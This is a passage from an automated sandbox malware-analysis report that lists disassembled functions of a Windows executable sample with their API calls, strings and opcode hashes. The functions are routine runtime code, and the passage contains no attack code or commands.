                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE310C21619AC145EA21AF15EC907EAA275FF44BE0F891238EE6D477D6DF2CD2019B10
                                                                                                                                                                                                                        Function 00007FF7293425F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                        • API String ID: 1878133881-653037927
                                                                                                                                                                                                                        • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                        • Instruction ID: fd8db0d67847b804b5276ade4dfe289eeddf1542bc68a2e412f07df7118deab5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8118B62628A8581EA20AF10EC91BE9B374FB48B84FD5113EDA8D17656CF3CD605CB10
                                                                                                                                                                                                                        Function 00007FF729342870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                        • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                        • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                        • Instruction ID: 9f2c153adec87333ec9dd1e161408154c3f36c715cd6a352a5ab74ae440e4793
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54118B62628A8581EA20AF10EC91BE9B374FB48B88F95113EDA8C57656CF3CD614CB10
                                                                                                                                                                                                                        Function 00007FF72935B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                        • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                        • Instruction ID: f9ccd93eeb2f83e2044743eb81f0db8587402ae141fe3a5626e716d0ac0918ba
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAD12672B08A8199E710DF65D8802EC7BB5FB4C798B98413DCE5E57B8ADE38D006DB14
                                                                                                                                                                                                                        Function 00007FF72935EC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                        • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                        • Instruction ID: 637534407f3e77dca1e83cf13029550f646817aaf0b76cce2381c0ccbd185f55
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E510772F181116AEB24EF649DC52BCABF1EB08358F98413DDD1D52AE6DB38A401DB10
                                                                                                                                                                                                                        Function 00007FF729354A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                        • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                        • Instruction ID: 280a6f9ad3ff824ad9c5e831a12fc1086dd078b1ae1a5cbbf0e7c0cffb58e2ac
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519032A086419AFB18EF71D8843BDABF1EB4C768F594038DE4D6764ADF38D4419B20
                                                                                                                                                                                                                        Function 00007FF729342030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                        • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                        • Instruction ID: 0faa257b689ec55e7a06bc442d6f88defbf4d1d69b6272d4c32f8f9788954008
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11CA21A0C14241F654AF59EDC42B992B1FF84780FCE903DDA4906B9BCD2CD485AD14
                                                                                                                                                                                                                        Function 00007FF72934C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                        • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                        • Instruction ID: c4762ca6cfbafc34c45b24ba855c6ae2fd1564ae810f7e033322692770982e64
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0115E22B18F058AEB00DF60EC842B873B4FB5A758F881E39DA2D467A5DF7CD1549B50
                                                                                                                                                                                                                        Function 00007FF729364E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                        • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                        • Instruction ID: 72044908d5a44d67fbc0e09e0a18dd14065da4b14f037555bdbc4b01c2d2839f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C412912F0828255FB24AF15D889379D6B0EB857B4F99423CEE5C06ADADF3CD4819F14
                                                                                                                                                                                                                        Function 00007FF72935832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72935835E
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: RtlFreeHeap.NTDLL(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: GetLastError.KERNEL32(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C78
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72934BEC5), ref: 00007FF72935837C
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                        • API String ID: 3580290477-2254132320
                                                                                                                                                                                                                        • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                        • Instruction ID: 1339e2da1919addf9a3dc2690c6f21a1eac5aee64b3089ad16b175d26bf1c38c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97416E36A08A5295E714EF25ECC00B9AAB4EB4D790FD94039EA4E43B86DE3CD4419B20
                                                                                                                                                                                                                        Function 00007FF72935F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: .$:
                                                                                                                                                                                                                        • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                        • Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                                                                        • Instruction ID: c5b5971d30392f9cc5bec49f0a0c93bfaf88b2a31ba910f5d521b67dafe11f05
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48415622F04B5268FB10AFB19C902FC6A75EF1C758F98003DDE4DA7A4ADF389441A721
                                                                                                                                                                                                                        Function 00007FF72935BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                        • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                        • Instruction ID: 5ca02fa21eaab5138ce2c254ff2c270fdfba7d92ef866990ded66816183da7fb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D241B462A18A8592DB20AF25E8843A9B7B0FB4C794F894039EE4D87759DF3CD441DF50
                                                                                                                                                                                                                        Function 00007FF72935E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                        • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                                        • Instruction ID: 571b55a9efdea09c46c25a41e305fdac14e069d156054a315ece9f8a90259449
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C121C322A0868191EB60AF15D8C427DA7F2FB8CB44FC9403DDA8D4328ACF7CD944DE61
                                                                                                                                                                                                                        Function 00007FF72934F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                        • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                        • Instruction ID: b6d4933fa50a1691322bbfafddca947d926b366f0bde1b62c4b345fe49c1e983
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98115E36618B8482EB219F15F88026AB7F0FB88B84F5D4238DB8D47B65DF3CC5518B00
                                                                                                                                                                                                                        Function 00007FF72935FA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                        • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                        • Instruction ID: 42e8699ecb1f0bb6f5c18d0c3c766772fa5527c431aad75d89117ecde18e7528
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301712191C24296F720BF609CA12BEABB0EF4C708FC8003DD54D86692DE3CD504EE26

                                                                                                                                                                                                                        Executed Functions

